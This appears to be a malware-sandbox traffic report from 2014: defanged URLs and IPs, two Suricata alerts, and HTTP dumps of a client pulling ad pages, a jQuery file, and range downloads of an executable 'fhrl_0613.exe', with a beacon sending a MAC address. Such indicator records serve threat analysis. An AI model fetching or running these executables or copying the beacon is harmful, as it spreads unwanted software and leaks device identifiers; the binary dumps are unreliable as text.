hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://img04.sogoucdn.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif 58.215.147.38
hxxp://client.fhrlw.com/api/GetConfig.ashx 61.147.103.147
hxxp://client.fhrlw.com/Api/GetWeather.ashx?province=??&city=?? 61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://client.fhrlw.com/Api/GetHoliday.ashx 61.147.103.147
hxxp://ddl.9yfc.com/xxdd_165.exe 211.149.191.150
hxxp://inte.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= 220.181.124.6
hxxp://p.inte.sogou.com/testgpimg/sogou_icon_short.png 222.211.87.185
hxxp://client.fhrlw.com/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://imgstore04.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg 1.115.192.23
hxxp://img04.sogoucdn.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif 58.215.147.38
hxxp://client.fhrlw.com/ad/fixad.html?id=9995 61.147.103.147
hxxp://dspcm.brand.sogou.com/qi 106.120.151.61


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.

Traffic

GET /js/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Sep 2013 02:48:44 GMT
Accept-Ranges: bytes
ETag: "5bc4399aabaace1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
/*.. * jQuery JavaScript Library v1.3.2.. * hXXp://jquery.com/.. *.. *
 Copyright (c) 2009 John Resig.. * Dual licensed under the MIT and GPL
 licenses... * hXXp://docs.jquery.com/License.. *.. * Date: 2009-02-19
 17:34:21 -0500 (Thu, 19 Feb 2009).. * Revision: 6246.. */..(function(
){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return ne
w o.fn.init(E,F)},D=/^[^<]*(<(.|\s) >)[^>]*$|^#([\w-] )$/,
f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;
if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(t
ypeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.cle
an([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]
){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;re
turn F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(do
cument).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;t
his.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(
E))},selector:"",jquery:"1.3.2",size:function(){return this.length},ge
t:function(E){return E===g?Array.prototype.slice.call(this):this[E]},p
ushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.c
ontext;if(H==="find"){G.selector=this.selector (this.selector?" ":"") 
E}else{if(H){G.selector=this.selector "." H "(" E ")"}}return G},setAr
ray:function(E){this.length=0;Array.prototype.push.apply(this,E);retur
n this},each:function(F,E){return o.each(this,F,E)},index:function(E){
return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){va
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=614400-819200
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 614400-819200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
>.\${.V....gR.M#.m...=....%..".....y..hg>..Jw...p.1.Zd......I.z1
..2K......U..\P.....Q..A..&...zek...{.d.!..k.:..J....jC.?...t...d."...
|E..'..j.........=:E.>}0?...2..I..d..._.o^u..-..,)..&.=|...d83.....
....XY..YZ.,[email protected] ..GE:#JD..nu...x.[.......R.p...$..AV..
..-J..>..p"0..6.`Qdd..t.z.'#2..O..9.~.L...........X.|.Ock..J..O.[.f
...Z.363.q.|..X.)1.....*.SS.'.i.#...7..5P..mp......2tZ/k...e#I...~...(
.{..,o2.......Q..`.f.....k1.....S1....:b..^.Fi|......N..=...Li..7.r...
Gj....Q..A'#HB.........4.6B...P....S....s..]em........e...a...&..L....
.*[.3.?.w.h._.w..$....?7.h......,...n.^.i.3.#)..F...H"t..#...a..$:22..
.'..........p.a...U[L3...Q9.B.K.......?..........q..\.I.D9<Poz.&k%7
d...U.A.UFl#....;(a::.-e.X .%.)..7...w.-..b....k:...~.._}T.q#7s}j.....
........_u.j0 s..C.M".h6y.fzGH.I.YAU6F........(Y.qh.. .:.......'......
...<_....,~.-8.9Jf?.,... ..2..".L....G.|.f....,..F..boQ....9....C..
\T..t..}..mOHt...fI...X.Z.I..R7D.L.,.b.@.*.p.A..t..7..>.3..;.....@.
.IMT.}*...j,.\N.w...E.IOZ.../.........O.....QYd.1=.M........s[/j.M..1.
^..j..s......4.....c.EX.............>&.G....p.;.*t....0..s...C&.j..
".9^....7.>..-..x >.............~/....<.<;...9%,...j=..-..
...NHzZ..Ba.......*.=...Cv.,u....P|c....J...><.jy!..Jw.7.......4
.*.3.d!U!..^i.8/.A...Blp..c........-~.B..W...7. tS9.})k.@>...s'..'c
.....SEW=b[-5...0Y...mbr...(.m...~.._......t.'...%....j.~(e..N"..3/e..
....,..........l.s...EwK.,........`^..<n..W...._....?...3..!8.S.l."
D....BoB`R}Z.....B..,..`i......F..B.....x..MQn...>...C3...;.[Y`
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:15 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....
Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.
......k...  .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O
.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.
m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<
./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)[email protected]
.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/.
..Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|...
[email protected]_..~,.bA2.....W.i..H!.
.........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....
^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....
;[email protected]..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V"&g
t;[email protected]...=4..%.suDN.-..}Kj.qn-/._..n..
;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C..
/.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*....
.-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T
..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bx
yb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls
.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|
.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7
..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."
...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1228800-1433600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1228800-1433600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
..fw.....H.rA. ^.wr(@.:?/[.......HO2Y[........s...jXQ~......66.B.r....
.zO.....W9..\m.....D....u|BC0^....K....(.)E;....J(.B...krK....6.......
...........W..4...e.j....q)M#$.~..B5...DS..0H....h:..,.S?.........4..t
W...;.....q..<. ....%.=.mB...j..M^H......... ..C.....Y.`...`!......
....%...X..j.H. !rOI3.......2...pO.}(....<g.^0.'Ch.O..d......12q.t.
.V.O<.......x.......WP..bW..cV..?l_X.^..0.1.&.... [email protected]....
...........h" .mZ........,}9...j..J.....^.....xjU....#..l....%n|.....g
......_UT2.{..........y..U7.......^'..X!....XH /.x....lJ.:..4..J...j..
{N.G1.....K..6.O.'Z........r.YXY.j.<kK.'...[...SG..hw.,/..L.m=...T.
...$i....C.T..c!?.V)dU..3..62..1L...SE>V..4#......x......3.......R.
'...v....2.?.^.s.Df........Sr..G..........C.Ad.-~.bS..!{V..g.,..:.....
>.D.......o.J...z.&.(.......*..}V.......-...l$R..*|..Ja.n........j.
..."............)..../7...[..9..aEC.....Z...H."..........A........|..O
{R............G).!-..../....#[?..I].=Y4A.W..s D-..qe.3.....#...C.nW..M
..).V.8>;.0.".[:...IO.cI.z.."..u.C.l&..~Y..d.t.|[S.......(.m....F..
i,....fB|.S..C7TQ<l...QQ._... .[$\{l....s:.c...3...".5......I;$..1J
..u.U^~...#.....Td......z.TS......~rs.A!..1.R.u..o.r.l.q..$)...Y..~.PX
......U..I(....4.....-.J.#.S.(0u.......If:....}.Q.4jT.h...qr.N=.|}./.}
..k@C6. ...........e..p.......9...J.T..3.Lv.....L.x...9.....~Mh>k .
BW...f..L.0V.H....|.....U.....Th*..<q.../.7C.L.& ......n}....{..?Qp
.?.....s....\......1.....x.Z.......sy.x.Uogmg]t....'`.V..............g
M..>.........<..k0.LN..T....9.^.V..#V..m.....kX.........V4Zz
<<< skipped >>>


GET /app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:48 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 9023c15c2b74fd70a034d1b373a42e09
Expires: Mon, 14 Jul 2014 01:04:57 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 01:04:57 GMT
90bc...PNG........IHDR.......<.....d\.|....pHYs...u...u..>.....M
iCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@.
...V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:.
..OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T...
....S.d.....ly|B"......I>..................(G$.@..`U.R,......@"....
..Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!.
.l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._.
...p...u.k.[..V.h..][email protected].<......%b..0..>.3.o..~..@
[email protected]..#......)..4.\,...X..P"M.y.R.D!......2...
...w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....
D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p.
.`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2..
[email protected].]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.
X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.
&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O......
.:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t
.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.
V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc.
...!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..
j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m....
......704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<
;abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M..
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....
Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.
......k...  .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O
.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.
m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<
./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)[email protected]
.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/.
..Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|...
[email protected]_..~,.bA2.....W.i..H!.
.........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....
^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....
;[email protected]..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V"&g
t;[email protected]...=4..%.suDN.-..}Kj.qn-/._..n..
;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C..
/.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*....
.-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T
..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bx
yb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls
.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|
.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7
..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."
...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....
Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.
......k...  .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O
.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.
m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<
./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)[email protected]
.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/.
..Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|...
[email protected]_..~,.bA2.....W.i..H!.
.........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....
^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....
;[email protected]..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V"&g
t;[email protected]...=4..%.suDN.-..}Kj.qn-/._..n..
;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C..
/.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*....
.-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T
..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bx
yb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls
.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|
.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7
..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."
...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2048000-2252800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 2048000-2252800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:06 GMT
....`[email protected]=H$.......b.".....'...6..B....E..,..S..E...r.0hns
.9...t.(........!<....o....^y g.{G'......#........&;.60CD(.8......P
..n...w.\........W.o... q..O.k.4T)V.....-.......X. ...H...0...(..,.vq6
.r.Y...w".bF.).....-..`%...17c..U`...v.O..D...!..U..2e..........p.~j.C
[email protected]%.....$t5...`..A..?.,..M#.....E.....l.....yP....$...x.%..G...@U
[email protected]..&.....r. .6.....TLZ.....rh......=|1.....,..J......w...
......4..M.9N.\.E~=....baX.N.G.x.[...7..E.q?NmFT&..../A|U.$.....u.g&..
iC...m......3......s.(R.h6.T..\g......;.w.....^....LvU.K.........4....
...U*_'3..O..K.MF..L....F.w.........PNG........IHDR...1...0.....7.....
..pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB.
...l.."#[email protected]....(.gA..Z.U\8.....}z..........
..y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$.....
.P&W. ...".....R...T.......S.d.....ly|B"......I>..................(
G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..
H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k
.o">!.........N..._....p...u.k.[..V.h..][email protected].<....
..%b..0..>[email protected][email protected]..#......)..4.\,...
X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y......
.@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.
............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r..
.Bj.]H#.-r.9.\@.... [email protected].]...k....=.....K.ut.}.
.c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#..
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=409600-614400
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 409600-614400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
...3k......}H.FO.......<_...*[email protected]$>..!...&p...H........>|N
.......R...,.6d....X}....).p?E.|v.d.-.b,.`.y)......B\.}Z......E&.|..x.
Jl4....Fro.eR..0...a..nXU..^Ax.T. ..d.V...........=~...&...........kq.
......O....O...,[email protected]:.o8d.pY.......1......B../.m.Tn.T[..S.w..b..
Pw"..b...../..2.oY...^.......`3....tN(.v.. .K,..C',\.S@f..<.'...h..
Xz.I...`..B]f../.'ixtr...X.h...fZ..8.......)M.T.W~O.....{...9.........
...H....Q....4h...nl'P.y.............L'_%...K.][...Ve.W........d(...1.
v..u8....F...2."%.t..2....;2.\[email protected]. ...N .... .q....O..Z..r.s.A.
.$....n..E|.l..(.mTR...p...N....G.|H=...V.xzc...n.*.._....-c.*.g.gF.X.
[email protected]".':N..Xc.=r.z.k... #...C...6.*..p..[...i.\.bQ.!...z!...K1U(@
 ......0?BS.d/j...Z...b.]ph..,#..lZ...*..[c.y.....T.Y.`1...V4#.~...1*$
lD....K(U{%0.."q........L......{m.Fe.r{5..._{*B.F...^.........s...9\.,
.MD6UkL..H7..B= . .u.F..Sp..k......he..$..O;6.8..i.d$Fqz.#........y..u
.;u..wkJG4sN^].....?.... ....y.}.....(..7.. L.s.!XJ3?}........h.`.?..]
...X.^t*.M....?.. (K......dL.A... EZi.....XFTZHb....C...0g.q&.El.....9
..!~..yd.sDO.........h..N.gK..|-..<.i.9.s..2.....g..8..........qx6.
...../.o...Y.]E..G.*a..d.#...}.AW.../.m.l.G.G.B-..!k.UX......O...*(.&.
n...2.>....]...q..vp.J=M| INT..xN....O..e..%l....-w.sF].Y..~..W....
{.B...i.p.....R<.....;.F.u..........1X ..v&V.....20.M.q.. w...8@. .
......._........ggZ_......[-..K^B_.N.9t.g.v.....nK&."=....~,.0.M.^.r..
.. ..5\j....uC8.<...[..&...n....0..9.2...#..z.n...D.9.y? ....'o.]|.
.....:.......U J..g...=...MC...Ul...3.......8...i.......-v.rBI..?.
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:14 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:29 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
